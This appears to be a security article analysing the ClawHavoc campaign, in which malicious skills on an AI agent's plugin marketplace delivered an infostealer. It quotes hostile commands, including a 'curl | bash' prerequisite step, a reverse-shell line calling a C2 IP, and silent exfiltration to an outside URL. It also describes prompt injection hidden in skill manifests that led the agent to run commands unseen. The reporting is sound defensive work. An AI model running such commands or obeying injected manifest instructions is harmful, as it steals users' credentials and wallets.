On January 27, 2026, the first malicious skill appeared on ClawHub, OpenClaw's official plugin marketplace. Within three weeks, Koi Security researcher Oren Yomtov had identified 341 malicious skills out of 2,857 total — 11.9% of the registry. By February 16, that number had grown to 824 across a...
"OpenClaw is a security dumpster fire." — Laurie Voss, Head of Developer Relations at Arize, Founding CTO of npm
On January 27, 2026, the first malicious skill appeared on ClawHub, OpenClaw's official plugin marketplace. Within three weeks, Koi Security researcher Oren Yomtov had identified 341 malicious skills out of 2,857 total — 11.9% of the registry. By February 16, that number had grown to 824 across an expanded registry of 10,700+ skills. Independent researcher @chiefofautism subsequently catalogued 1,184 malicious packages, with a single threat actor responsible for 677 of them.
The operation, codenamed ClawHavoc, delivered Atomic macOS Stealer (AMOS) — a commodity infostealer sold as malware-as-a-service on Telegram for $500–$1,000 per month. It harvested browser passwords, cryptocurrency wallets, SSH keys, macOS Keychain data, and OpenClaw configuration files containing API keys. Ninety-one percent of the malicious skills also embedded prompt injection, attacking the AI agent itself to silently execute commands without user visibility.
The most popular community skill on ClawHub — ranked #1 by downloads — was malware. Cisco's AI Defense team scanned it and found nine vulnerabilities, two critical. The marketplace that enabled all of this required nothing more than a one-week-old GitHub account to publish. No code review. No static analysis. No signing. No sandbox.
Koi Security's Oren Yomtov conducted the first comprehensive audit of ClawHub in late January 2026. Working alongside an OpenClaw bot configured for threat analysis, Yomtov scanned all 2,857 skills available on the marketplace at that time.
The results: 341 malicious skills. Of those, 335 belonged to a single coordinated operation — ClawHavoc. The remaining six were independent malicious actors using different techniques but exploiting the same absence of platform controls.
"You install what looks like a legitimate skill — maybe solana-wallet-tracker or youtube-summarize-pro," Yomtov said. "The skill's documentation looks professional. But there's a 'Prerequisites' section that says you need to install something first."
Koi continued monitoring as ClawHub expanded. By February 16, 2026, the marketplace had grown to over 10,700 skills. Koi's confirmed malicious count had risen to 824 — the campaign was growing faster than the marketplace. A separate analysis by @chiefofautism identified 1,184 malicious packages total, finding that 12 compromised publisher accounts coordinated the campaign and that a single attacker had uploaded 677 packages — 57% of all malicious listings.
Separately, Snyk engineers scanned nearly 4,000 skills and found 283 (7.1%) exposed sensitive credentials through architectural flaws — not malice, but negligence. Skills like "buy-anything" tokenized credit card numbers, sending financial data through LLM context windows to model providers in plaintext. The marketplace's problems extended beyond deliberate poisoning into systemic insecurity.
ClawHavoc was not a lone actor uploading trojanized code. It was a coordinated operation with shared infrastructure, consistent tactics, and industrial-scale output.
All 335 skills in the primary campaign shared command-and-control infrastructure centered on IP address 91.92.242.30, with additional C2 nodes at 95.92.242.30, 96.92.242.30, 202.161.50.59, and 54.91.154.110. The skills followed a consistent pattern:
Category distribution of the 335 ClawHavoc skills:
| Category | Count | Examples | |----------|-------|---------| | YouTube utilities | 57 | youtube-summarize, thumbnail-grabber, video-downloader variants | | Polymarket bots | 34 | polymarket-25nwy through polymarket-z7lwp | | Solana wallets | 33 | solana-07bcb through solana-xx1q5 | | ClawHub typosquats | 29 | clawhub, clawhubb, clawwhub, cllawhub | | Phantom wallet | 28 | phantom-0jcvy through phantom-ygmjc | | Auto-updaters | 28 | update, updater, auto-updater variants | | X/Twitter trends | 25 | x-trends variants | | Yahoo Finance | 24 | yahoo-finance variants | | Google Workspace | 17 | gmail, calendar, sheets, drive integrations | | Ethereum gas tracker | 15 | ethereum-gas-tracker variants |
The targeting was deliberate. Cryptocurrency tools and financial trading bots attracted users most likely to have exchange API keys, wallet private keys, and high-value credentials on their machines. YouTube and social media tools provided volume. Typosquats of ClawHub itself — the marketplace's own name — caught users making typographical errors during installation.
ClawHavoc employed a dual-vector attack combining social engineering against humans and prompt injection against AI agents. Ninety-one percent of malicious skills used both simultaneously.
Vector 1: ClickFix Social Engineering
Each malicious skill contained a professionally formatted SKILL.md file — the Markdown manifest that OpenClaw reads to understand a skill's purpose and requirements. Embedded in the documentation was a "Prerequisites" section instructing users to execute shell commands before the skill would function:
curl -sL https://glot.io/raw/snippet | bash
The commands downloaded second-stage payloads from attacker infrastructure. On macOS, this was an obfuscated shell script containing base64-encoded commands that fetched a universal Mach-O binary (x86_64 + arm64) — the AMOS stealer, 521KB, with heavy string encryption. On Windows, users were directed to download password-protected ZIP files containing "openclaw-agent.exe" — the password requirement a deliberate technique to bypass antivirus scanning.
"The password-protected ZIP isn't for security. It's to evade antivirus scanning," Koi's analysis noted.
Vector 2: Prompt Injection Against the AI
The more significant vector targeted the AI agent itself. Skills embedded hidden instructions in their SKILL.md manifests — text that appeared normal to users reading documentation but contained directives that manipulated the LLM when the manifest entered the agent's context window.
These prompt injections directed OpenClaw to:
curl commands silently, sending data to external servers/dev/null to suppress any visible indication of malicious activityThe user saw nothing. No confirmation dialog. No output. The AI agent, reading the manifest as part of its skill integration process, interpreted the hidden instructions as legitimate directives and executed them with the same OS-level privileges it held for all operations — full file system access, shell execution, and network connectivity.
This is the architectural failure at the core of OpenClaw's skill system: plugins execute with the same privileges as the parent process. There is no permission boundary between a skill that summarizes YouTube videos and a skill that exfiltrates SSH keys. Both run with identical access.
Cisco's AI Defense team ran their Skill Scanner against OpenClaw's most popular community skill — "What Would Elon Do?" — which had achieved the #1 ranking on ClawHub. The skill had been gamed to the top through approximately 4,000 fabricated downloads before accumulating thousands of legitimate installs from users who trusted the ranking.
Cisco found nine security vulnerabilities. Two were critical:
https://clawbub-skill.com/log, with output redirected to /dev/null to avoid detection.The five high-severity findings included command injection via embedded bash commands, tool poisoning with malicious payloads in skill files, and authentication bypass vulnerabilities.
Cisco identified four enterprise risk categories emerging from the ClawHub model: AI agents with system access functioning as covert data-leak channels that bypass traditional security tools; LLMs serving as execution orchestrators where prompts become undetectable instructions; malicious skills artificially ranking high in repositories to amplify supply chain compromise at scale; and shadow AI emerging when employees unknowingly deploy compromised agents as productivity tools.
The primary payload delivered by ClawHavoc was Atomic macOS Stealer (AMOS), a commodity infostealer available as malware-as-a-service on Telegram channels for $500–$1,000 per month. AMOS is not novel malware. It is a well-documented, commercially distributed credential harvesting tool. The ClawHavoc operators were customers, not developers.
AMOS capabilities deployed through ClawHub skills:
~/.clawdbot/.env containing Anthropic, OpenAI, and other LLM provider credentials — each worth direct financial valueThe six outlier skills — those not part of the main ClawHavoc cluster — used different techniques. "better-polymarket" and "polymarket-all-in-one" contained reverse shell backdoors triggered during normal operation: os.system("curl -s http://54.91.154.110:13338/|sh") granted attackers interactive access to the victim's system. "rankaj" performed direct credential exfiltration from ~/.clawdbot/.env to webhook.site.
VirusTotal analyzed over 3,016 skills using their Code Insight capability and identified a single publisher, "hightower6eu," responsible for 314 malicious uploads. VirusTotal characterized the ecosystem as "a malware delivery channel," identifying large-scale distribution of stealers and droppers embedded within skill packages.
ClawHub reproduced, almost exactly, the supply chain vulnerabilities that npm, PyPI, and Docker Hub spent a decade learning to mitigate — then failed to implement any of the solutions.
The parallels are structural:
Identity verification: npm suffered repeated compromises through stolen maintainer tokens before implementing Trusted Publishing with OIDC-based provenance attestation. ClawHub required only a one-week-old GitHub account. No verified identity. No two-factor authentication requirement. No provenance chain.
Code review: PyPI implemented malware scanning through the PyPI Malware Checks project, TrustedPublisher verification, and mandatory 2FA for critical packages after repeated typosquatting campaigns. ClawHub had no automated scanning at launch, no manual review, no static analysis.
Signing and verification: npm introduced package signing. Docker Hub implemented content trust with Notary. ClawHub skills were unsigned Markdown files and shell scripts.
Sandboxing: Even traditional package managers, which already isolate packages during installation, faced devastating supply chain attacks — the event-stream compromise (npm, 2018), the ua-parser-js hijack (npm, 2021), and dozens of PyPI typosquatting campaigns. ClawHub skills ran with full OS privileges of the parent process. No sandbox. No capability restrictions. No permission model.
The difference in consequences is also structural. When a malicious npm package runs postinstall scripts, it has the permissions of the Node.js process. When a malicious ClawHub skill runs through OpenClaw, it has the permissions of an AI agent with access to email, calendar, messaging, file system, browser, shell commands, and 50+ integrations. The blast radius of a compromised OpenClaw skill dwarfs that of a compromised npm package.
As the Netizen blog's analysis of the ClawHub incident concluded: "Supply chain compromise at the automation layer" transforms "the distribution channel" into an attack surface where "the execution engine is the agent runtime sitting inside an enterprise endpoint." Traditional static screening — signature scanning, account age requirements — cannot serve as the sole defense.
The initial response was community-driven. Peter Steinberger activated a reporting mechanism allowing signed-in users to flag suspicious skills, with automatic hiding after three independent reports. This was a moderation tool, not a security control.
Following the Koi Security disclosure, OpenClaw partnered with VirusTotal to scan skills uploaded to ClawHub. Steinberger stated that "all skills published to ClawHub are now scanned using VirusTotal's threat intelligence, including their new Code Insight capability." VirusTotal added native support for OpenClaw skill packages in their analysis pipeline.
Koi Security developed Clawdex, a skill for pre-installation scanning that checks skills against a database of known malicious packages before payload execution. Cisco released Skill Scanner, an open-source tool combining static analysis, behavioral analysis, LLM-assisted semantic analysis, and VirusTotal integration.
These are reactive measures. They arrived after 1,184 malicious skills had already been distributed. The marketplace operated for weeks with no scanning, no review, and no sandboxing. The question is not whether the response was adequate. The question is why a skill marketplace connected to an AI agent with full system access launched without these controls in the first place.
ClawHavoc was not a sophisticated attack. It did not exploit a zero-day vulnerability or bypass advanced security controls. It exploited the absence of controls. The attackers used commodity malware, recycled social engineering techniques, and the same typosquatting strategies that have plagued package managers for years. The only innovation was the target: an AI agent that multiplied the impact of each compromise by granting access to everything on the victim's machine.
The lesson from npm's event-stream incident in 2018 was that open-source marketplaces require active security investment proportional to their blast radius. The lesson from PyPI's repeated typosquatting campaigns was that account age alone is not a meaningful identity verification. The lesson from Docker Hub's trojanized images was that container registries need content trust and signing.
ClawHub ignored all of these lessons. It launched a skill marketplace connected to an agent with root-level access to users' digital lives, and the only barrier to entry was a seven-day-old GitHub account.
Part 4 of this series examines the infostealer campaigns targeting OpenClaw users directly — the Vidar variants harvesting gateway tokens, device keys, and memory files from machines where OpenClaw was installed.